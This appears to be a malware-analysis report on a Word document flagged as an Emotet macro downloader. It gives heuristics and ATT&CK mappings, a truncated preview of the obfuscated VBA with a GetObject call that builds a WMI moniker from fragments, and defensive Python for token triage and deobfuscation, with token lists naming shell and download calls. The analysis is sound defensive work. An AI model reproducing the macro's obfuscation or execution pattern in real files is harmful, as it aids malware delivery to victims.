Verdict: MALICIOUS (risk score 242)

Malware Insights

MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic), T1566.001 (Phishing: Spearphishing Attachment)
The sample carries several independent indicators of macro execution: an AutoOpen VBA macro (run without user interaction once macros are enabled), a legacy WordBasic auto-exec marker, and a GetObject call whose argument is assembled from string fragments interleaved with junk identifiers. Those identifiers are never assigned in the visible source, so if they are Empty the argument resolves to the WMI moniker winmgmts:Win32_ProcessStartup. The 73 KB of extracted VBA is padded with meaningless arithmetic and Select Case blocks keyed on variables the visible source never assigns, so none of their branches run; this is routine obfuscation aimed at keyword-density and signature scanners. ClamAV's Doc.Downloader.Emotet-6864615-0 signature attributes the file to Emotet's maldoc downloader stage. Note that the download-and-execute purpose rests on that signature rather than on visible code: the macro preview below is truncated before any process-creation or download routine appears. Two heuristics need care. The OLE_LEGACY_WORDBASIC_AUTOEXEC description states that no modern VBA project was recovered, which contradicts the extracted VBA source, so it should not be counted as independent corroboration. OLE_XLM_AUTOOPEN reports an Excel 4.0 macro sheet in what is a Word document (VB_Base = "1Normal.ThisDocument"), so confirm that the XLM sub-stream belongs to an embedded workbook before reporting it. The combination of VBA macros and the Emotet attribution is consistent with a spear-phishing attachment delivery vector (T1566.001 leading to T1059.005).
Heuristics (8)

- ClamAV: Doc.Downloader.Emotet-6864615-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Emotet-6864615-0.
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro.
- GetObject call [high, OLE_VBA_GETOBJ]: GetObject call.
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium, OLE_LEGACY_WORDBASIC_AUTOEXEC]: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Excel 4.0 (XLM) macro sheet present [medium, OLE_XLM_AUTOOPEN]: Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
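As an added example of the logic behind OLE_VBA_AUTOOPEN, OLE_VBA_GETOBJ, OLE_VBA_PCODE_AUTOEXEC_EXEC and OLE_LEGACY_WORDBASIC_AUTOEXEC (this is not the analyzer's own code; its token lists and stream parsing are not on this page), the following Python triages VBA stream contents by token presence. It scans raw bytes because VBA module streams keep identifier names even when the compressed source cannot be recovered, which is what makes p-code-only documents detectable. The stream names, token lists and every stream body are assumptions constructed for the example.

```python
"""Token-based triage modelled on the report's OLE_VBA_* heuristics.

Added example, not the analyzer's own code. All stream contents below are
constructed; stream names such as 'VBA/__SRP_0' are illustrative.
"""

# Entry points Office runs without a click: legacy WordBasic names and
# their VBA / Excel equivalents.
AUTOEXEC_TOKENS = (
    b"AutoOpen", b"AutoExec", b"AutoClose", b"Document_Open",
    b"Document_Close", b"Workbook_Open", b"Auto_Open",
)
# Shell, download and object-execution tokens.
EXEC_TOKENS = (
    b"GetObject", b"CreateObject", b"Shell", b"WScript.Shell", b"winmgmts",
    b"Win32_Process", b"URLDownloadToFile", b"XMLHTTP", b"powershell", b"cmd.exe",
)


def find_tokens(blob, tokens):
    """Case-insensitive token search in both ASCII and UTF-16LE encodings."""
    low = blob.lower()
    return [t.decode() for t in tokens
            if t.lower() in low or t.decode().lower().encode("utf-16-le") in low]


def triage_vba_streams(streams, source_recovered):
    """Return (heuristic_id, severity) pairs for one document.

    streams: {stream_name: bytes} as read from the OLE container.
    source_recovered: True when olevba could decompress readable source.
    """
    blob = b"\n".join(streams.values())
    auto = find_tokens(blob, AUTOEXEC_TOKENS)
    execs = find_tokens(blob, EXEC_TOKENS)
    findings = []
    if source_recovered:
        findings.append(("OLE_VBA_MACROS", "medium"))
        if auto:
            findings.append(("OLE_VBA_AUTOOPEN", "high"))
        if "GetObject" in execs:
            findings.append(("OLE_VBA_GETOBJ", "high"))
    elif auto and execs:
        # No readable source (p-code only or extraction failure), but an
        # auto-exec name sits next to execution tokens.
        findings.append(("OLE_VBA_PCODE_AUTOEXEC_EXEC", "high"))
    elif auto:
        # Auto-exec name alone: evidence of macro surface, not of a downloader.
        findings.append(("OLE_LEGACY_WORDBASIC_AUTOEXEC", "medium"))
    return findings


# Constructed sample 1: source recovered, GetObject argument assembled from
# fragments the way the extracted macros.bas does it. "winmgmts" never
# appears contiguously, so token matching cannot see the WMI moniker.
SOURCE_RECOVERED = {
    "VBA/l8498_": (
        b'Attribute VB_Name = "l8498_"\r\n'
        b"Sub AutoOpen()\r\n"
        b'Set h = GetObject("win" + "mgm" + "ts:Win" + "32_Proce" + "ssStartup")\r\n'
        b"End Sub\r\n"
    ),
}
# Constructed sample 2: p-code-only module stream holding identifiers in
# UTF-16LE and a contiguous moniker, with no recoverable source.
PCODE_ONLY = {
    "VBA/__SRP_0": b"\x01\x00\x00\x00" + "AutoOpen".encode("utf-16-le")
                   + b"\x00\x00\xff" + b"winmgmts:Win32_Process" + b"\x00",
}
# Constructed sample 3: legacy Word macro with an AutoOpen marker and nothing else.
LEGACY_WORDBASIC = {"WordDocument": b"MACRO AutoOpen\r\nMsgBox \"hello\"\r\n"}
# Constructed sample 4: plain document body.
CLEAN = {"WordDocument": b"Quarterly figures attached.\r\n"}

if __name__ == "__main__":
    for name, streams, recovered in (("source", SOURCE_RECOVERED, True),
                                     ("p-code", PCODE_ONLY, False),
                                     ("legacy", LEGACY_WORDBASIC, False),
                                     ("clean", CLEAN, False)):
        print(name, triage_vba_streams(streams, recovered))
```

The first sample also shows the limit of token matching: because the macro builds "winmgmts" from fragments, only GetObject is visible to the scanner, which is why resolving string concatenation has to be a separate analysis step.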
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 73317 bytes | 704af98808f5a79e1c242d582176ace8c0bd3c5d625d6caecc8bd95114553136 |

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "n087__81"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "l8498_"
Function T_58451()
J0333066 = 165732467 - 84652675
E1_28_ = 341336524 + f_0_299
Select Case w60605
Case 972385022
q7345201 = Chr(624482569 * Tan(w24079_))
E2_223 = l582228
Case 269909015
X842___ = J1_2673_
D2342553 = z06337_1
Case 981982878
O1508_42 = 624919321
o845553 = o63_70__
End Select
c11__2_2 = 335302691 - 163767063
a_333_2 = 752066423 + Q_5_185
Select Case O7___552
Case 728235867
F24_46 = Chr(428667804 * Tan(S3302_48))
O_4591 = U___5_
Case 950356694
a60020 = G53011_
d7__0_9 = p19_40
Case 725046007
F36321_7 = 711249076
T_17057 = r9262_3
End Select
w594__25 = 288704408 - 610200261
v042_279 = 663037056 + w_64_5
Select Case H4627_
Case 910985547
I381___ = Chr(898789535 * Tan(o06722))
Y6961986 = i_3_4_6
Case 489408960
K_96_4 = m_51647
n3_85755 = v7719__7
Case 634332277
h_0209 = 206569062
v70_057 = S51951_4
End Select
t638381 = 862278573 - 505579941
C87___ = 735337498 + N2_6_5_4
Select Case t86278
Case 928021334
m72___70 = Chr(861348596 * Tan(i7993_7))
t0__57_0 = S___7526
Case 910432846
h15976_ = j136_206
F_3_98_ = Q16946
Case 230400240
E_1__85 = 335104513
w60_167 = H029__7
End Select
G4__55 = 305226670 - 244983474
E95_25_ = 160350089 + O01__6_3
Select Case j_10_3
Case 314938330
F30_60 = Chr(8566119 * Tan(w_1901_))
w__824 = G803_1__
Case 811370710
k04_464 = C4_04_
N817_0 = V3__40_
Case 303917444
c0103_1_ = 650365981
w_10004 = r__7_3
End Select
T7_249 = 847119990 - 705658037
P8___3__ = 856104116 + z_0_61
Select Case t62570__
Case 869250915
n5_60111 = Chr(235842181 * Tan(c1_26922))
O__5344 = X1719__7
Case 992062415
w533_16 = J0_847
B7___5 = C1556323
Case 492833419
f872____ = 788258737
m34_7828 = p7_122
End Select
R_8219 = 149600281 - 549551068
R2__5_ = 106903657 + m9_7158
Select Case F_5___6
Case 266598414
C138___8 = Chr(141465764 * Tan(N0875978))
c4872_95 = D943791
Case 965999343
m600_3 = X4__01
i2__2414 = W6_088_
Case 163002022
a_9_25 = 870513954
Q_3001_ = J857_3_7
End Select
End Function
Function z_376_60(o5407_40, U_8155_7)
On Error Resume Next
w32_493 = 53167550 - 519478825
T5___29 = 870167159 + G3_56172
Select Case p06354_
Case 449068510
t036125_ = Chr(118122534 * Tan(F80_138_))
v99_0_89 = I_017_
Case 605775791
j01__0 = U416881_
b54_28_ = s952849
Case 899183990
q_293258 = 804588310
i1762_ = i7_55431
End Select
f057961 = 583149826 - 654559089
Q78893_ = 982340265 + h__1846_
Select Case k4115_
Case 82134585
w02772_8 = Chr(24314109 * Tan(L_____))
D2901__ = b402_29
Case 98842661
X___655 = W31970__
G7_16___ = q3_74_8
Case 344219010
U03_04 = 463832953
X_6536 = v5_9625_
End Select
Set h22227 = GetObject((Q820628 + "win" + o52820 + "mgm" + W_92559_) + (w8_16__ + "ts:Win" + Q2149_0_) + "32_Proce" + "ssStartup")
f_90__ = 921341036 - 49934387
R5_8_865 = 649702550 + z44780
Select Case u12736
Case 772081429
Y668441 = Chr(51375532 * Tan(a96062))
n54330_ = K_023___
Case 281035449
j_46_7_ =
... (truncated)
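The GetObject argument in the preview is built from string literals interleaved with junk identifiers. As an added example (not the analyzer's code and not part of the extracted macro), the following Python resolves such expressions by treating unassigned identifiers as Empty, which VBA concatenates as "" when the other operand is a String. That is an assumption: the visible source never assigns the junk identifiers, but the preview is truncated, so the env parameter lets an analyst plug in values found elsewhere in the full source. The sample input is the GetObject line from the preview plus constructed filler and a constructed CreateObject line in the same style.

```python
"""Resolve obfuscated string-concatenation arguments in extracted VBA.

Added example, not the analyzer's own code. Handles the subset of VBA
expression syntax the preview's GetObject call uses: string literals,
identifiers, the + and & operators and parentheses.
"""
import re

TOKEN_RE = re.compile(r'"((?:[^"]|"")*)"'         # string literal, "" escapes a quote
                      r'|([A-Za-z_][A-Za-z0-9_]*)'  # identifier
                      r'|([+&()])'                  # concatenation operators and parens
                      r'|\s+')                      # whitespace, skipped
CALL_RE = re.compile(r'\b(GetObject|CreateObject)\s*\((.*)\)', re.IGNORECASE)


def resolve_concat(expr, env=None):
    """Evaluate a pure concatenation expression; env maps known identifiers to values."""
    env = env or {}
    parts, depth, pos = [], 0, 0
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if not m:
            raise ValueError("unsupported syntax at %r" % expr[pos:pos + 12])
        pos = m.end()
        literal, ident, op = m.group(1, 2, 3)
        if literal is not None:
            parts.append(literal.replace('""', '"'))
        elif ident is not None:
            # Assumption: an identifier absent from env is an unassigned
            # Variant (Empty), which + and & treat as "" next to a String.
            parts.append(str(env.get(ident, "")))
        elif op == "(":
            depth += 1
        elif op == ")":
            depth -= 1
            if depth < 0:
                raise ValueError("unbalanced parentheses")
        # '+' and '&' both concatenate strings here; nothing to do for them
    if depth:
        raise ValueError("unbalanced parentheses")
    return "".join(parts)


def resolve_object_calls(vba_source, env=None):
    """Return (function name, resolved argument) for each GetObject/CreateObject call."""
    calls = []
    for line in vba_source.splitlines():
        m = CALL_RE.search(line)
        if m:
            calls.append((m.group(1), resolve_concat(m.group(2), env)))
    return calls


SAMPLE = "\n".join([
    # filler from the preview: the selector is never assigned, so no case matches
    'Select Case w60605',
    'Case 972385022',
    'q7345201 = Chr(624482569 * Tan(w24079_))',
    'End Select',
    # the GetObject call from the preview, verbatim
    'Set h22227 = GetObject((Q820628 + "win" + o52820 + "mgm" + W_92559_) '
    '+ (w8_16__ + "ts:Win" + Q2149_0_) + "32_Proce" + "ssStartup")',
    # constructed line in the same style, to show the resolver is not tied to one call
    'Set r_1 = CreateObject(a_0 & "WScr" & "ipt.Sh" & b_1 & "ell")',
])

if __name__ == "__main__":
    for func, arg in resolve_object_calls(SAMPLE):
        print(func, "->", arg)
    # If a junk identifier turns out to be assigned, the result changes:
    print(resolve_concat('(Q820628 + "win" + o52820 + "mgm")', {"o52820": "-"}))
```

Win32_ProcessStartup is the WMI class that configures how a process is launched (window visibility, for example); on its own it starts nothing. What the preview does not show is what is done with the returned object afterwards, because the extract is cut off before that point, so the process-creation step should be confirmed from the full macros.bas rather than inferred from this line.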